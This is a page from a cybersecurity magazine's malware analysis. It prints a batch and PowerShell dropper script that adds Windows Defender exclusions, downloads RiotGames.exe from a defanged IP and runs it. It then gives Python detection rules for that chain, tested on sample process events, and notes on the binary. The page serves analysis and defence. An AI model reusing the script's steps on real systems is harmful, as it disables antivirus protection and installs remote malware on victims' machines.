Page 91 - Cyber Defense eMagazine October 2023

Script:

            @echo off

            PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "%userprofile%\AppData\Local\Temp"; "Add-MpPreference -ExclusionExtension ".exe";Start-Sleep -Seconds 5; "Invoke-WebRequest 'http://141[.]95[.]16[.]111:8080/RiotGames.exe' -OutFile '%userprofile%\AppData\Local\Temp\RiotGames.exe'"; cmd.exe /c %userprofile%\AppData\Local\Temp\RiotGames.exe



            The script appears to download and execute an external executable (RiotGames.exe) from a remote
            location. Based on the script's content, it appears to perform the following actions:



               •  Add exclusions for the %userprofile%\AppData\Local\Temp directory and all files with the .exe
                   extension in Windows Defender.
               •  Download a file named RiotGames.exe from the specified URL
                   (http://141[.]95[.]16[.]111:8080/RiotGames.exe) and save it to the
                   %userprofile%\AppData\Local\Temp directory.
               •  Execute the RiotGames.exe file using cmd.exe.
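            Detection logic for the chain described above, added here as an example (it is not code from the article or from the analysed sample): it scans constructed process-creation command lines for the Defender exclusion, the download into Temp and the launch of the dropped file, and ties that launch back to the download. The event records, PIDs and the documentation IP 203.0.113.10 are all assumptions.

```python
import re

# Constructed process-creation records, shaped like the command lines a Sysmon
# Event ID 1 or Security 4688 collector surfaces. Sample data, not from the page;
# the host IP is a documentation address standing in for the real one.
SAMPLE_EVENTS = [
    {"pid": 4120, "cmd": r'PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension .exe; '
                         r'Invoke-WebRequest http://203.0.113.10:8080/RiotGames.exe '
                         r'-OutFile C:\Users\u\AppData\Local\Temp\RiotGames.exe"'},
    {"pid": 4121, "cmd": r'cmd.exe /c C:\Users\u\AppData\Local\Temp\RiotGames.exe'},
    {"pid": 4122, "cmd": r'PowerShell.exe -NoProfile -Command "Get-MpPreference"'},  # read-only, benign
]

# Indicators taken from the script's behaviour; PowerShell names are case-insensitive.
RULES = {
    "defender_exclusion_added": re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Extension|Process)\b", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+hidden\b", re.I),
    # Capture the -OutFile target so a later launch of the same file can be tied back.
    "download_to_temp": re.compile(r"Invoke-WebRequest\b.*?-OutFile\s+['\"]?([^\s'\"]*\\Temp\\[^\s'\"]+)", re.I),
    "download_from_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.I),
    # Only a launch counts (command start or cmd /c), not a Temp path that merely appears as an argument.
    "exec_from_temp": re.compile(r"(?:^|cmd(?:\.exe)?\s+/c\s+)['\"]?(\S*\\Temp\\[^\s'\"]+\.exe)", re.I),
}

def match_rules(cmd):
    """Return {rule_name: captured_path_or_None} for every rule that fires on one command line."""
    hits = {}
    for name, pat in RULES.items():
        m = pat.search(cmd)
        if m:
            hits[name] = m.group(1) if m.groups() else None
    return hits

def find_chain(events):
    """Correlate events in order: an exclusion added in the same command that drops a file
    into Temp, then a later process launching exactly that file."""
    findings = []
    dropped = {}  # lower-cased dropped path -> pid of the downloader
    for ev in events:
        hits = match_rules(ev["cmd"])
        if "download_to_temp" in hits:
            dropped[hits["download_to_temp"].lower()] = ev["pid"]
            if "defender_exclusion_added" in hits:
                findings.append(("exclusion_then_download", ev["pid"]))
        if "exec_from_temp" in hits and hits["exec_from_temp"].lower() in dropped:
            findings.append(("dropped_file_executed", ev["pid"]))
    return findings

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["pid"], sorted(match_rules(ev["cmd"])))
    print(find_chain(SAMPLE_EVENTS))
```

            Add-MpPreference changes also surface in the Microsoft-Windows-Windows Defender/Operational log as event 5007, an independent signal when process command lines are not being captured.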



            The binary “RiotGames.exe” is a 32-bit PE executable written in Visual C++, with a recent compiler/debugger
            timestamp of May 2023. The binary is not packed.
